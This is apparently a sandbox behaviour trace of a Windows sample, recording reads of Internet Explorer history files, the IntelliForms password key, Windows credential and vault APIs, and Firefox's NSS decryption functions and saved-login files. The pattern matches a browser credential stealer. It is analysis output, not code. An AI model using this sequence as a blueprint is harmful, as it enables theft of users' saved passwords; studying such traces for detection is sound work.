| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Create | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 32, size_out = 32 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, type = size |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
2 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
7 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
59 | |
| File | Create | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat, size = 32, size_out = 32 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat, type = size |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat, size = 8, size_out = 8 |
|
88 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\WebCache\WebCacheV24.dat, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x764f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptAcquireContextA, address_out = 0x764f91dd |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptReleaseContext, address_out = 0x764fe124 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptCreateHash, address_out = 0x764fdf4e |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptGetHashParam, address_out = 0x764fdf7e |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptHashData, address_out = 0x764fdf36 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptDestroyHash, address_out = 0x764fdf66 |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x764f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredReadA, address_out = 0x765371c1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredFree, address_out = 0x764fb2ec |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredDeleteA, address_out = 0x76537941 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredEnumerateA, address_out = 0x76537381 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredEnumerateW, address_out = 0x76537481 |
|
1 | |
| Module | Load | module_name = pstorec.dll, base_address = 0x71ec0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\pstorec.dll, function = PStoreCreateInstance, address_out = 0x71ec526c |
|
1 | |
| Module | Load | module_name = vaultcli.dll, base_address = 0x6f4d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\vaultcli.dll, function = VaultOpenVault, address_out = 0x6f4d26a9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\vaultcli.dll, function = VaultCloseVault, address_out = 0x6f4d2718 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\vaultcli.dll, function = VaultEnumerateItems, address_out = 0x6f4d3099 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\vaultcli.dll, function = VaultFree, address_out = 0x6f4d4321 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\vaultcli.dll, function = VaultGetInformation, address_out = 0x6f4d24c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\vaultcli.dll, function = VaultGetItem, address_out = 0x6f4d3242 |
|
2 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\history.dat, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\places.sqlite, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\places.sqlite, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\places.sqlite, type = time |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini, type = file_attributes |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile0, key_name = Path, data_out = Profiles/zp0p8bce.default |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile0, key_name = IsRelative, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile1, key_name = Path |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile1, key_name = IsRelative, default_value = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\bin |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin, value_name = PathToExe, data = C:\Program Files\Mozilla Firefox\firefox.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Program Files\Mozilla Firefox\nss3.dll, type = file_attributes |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Module | Get Handle | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, base_address = 0x63270000 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = NSS_Init, address_out = 0x6332d70b |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = NSS_Shutdown, address_out = 0x6332d13c |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_GetInternalKeySlot, address_out = 0x632c3c51 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_FreeSlot, address_out = 0x632c3333 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_CheckUserPassword, address_out = 0x632acbc4 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_Authenticate, address_out = 0x632ad3ca |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11SDR_Decrypt, address_out = 0x632c00a7 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\logins.json, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\signons.sqlite, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\bin |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin, value_name = PathToExe, data = C:\Program Files\Mozilla Firefox\firefox.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Program Files\Mozilla Firefox\nss3.dll, type = file_attributes |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| File | Get Info | filename = C:\Program Files\Mozilla Firefox\sqlite3.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\Mozilla Firefox\mozsqlite3.dll, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\program files\mozilla firefox\nss3.dll, base_address = 0x63270000 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = sqlite3_open, address_out = 0x633d1ca0 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = sqlite3_prepare, address_out = 0x6335ce70 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = sqlite3_step, address_out = 0x633c5200 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = sqlite3_column_text, address_out = 0x6337d400 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = sqlite3_column_int, address_out = 0x6337d3a0 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = sqlite3_column_int64, address_out = 0x6337d3d0 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = sqlite3_finalize, address_out = 0x633a9f60 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = sqlite3_close, address_out = 0x633abde0 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = sqlite3_exec, address_out = 0x633aa270 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\bin |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin, value_name = PathToExe, data = C:\Program Files\Mozilla Firefox\firefox.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Program Files\Mozilla Firefox\nss3.dll, type = file_attributes |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Module | Get Handle | module_name = c:\program files\mozilla firefox\nss3.dll, base_address = 0x63270000 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = NSS_Init, address_out = 0x6332d70b |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = NSS_Shutdown, address_out = 0x6332d13c |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_GetInternalKeySlot, address_out = 0x632c3c51 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_FreeSlot, address_out = 0x632c3333 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_CheckUserPassword, address_out = 0x632acbc4 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_Authenticate, address_out = 0x632ad3ca |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11SDR_Decrypt, address_out = 0x632c00a7 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
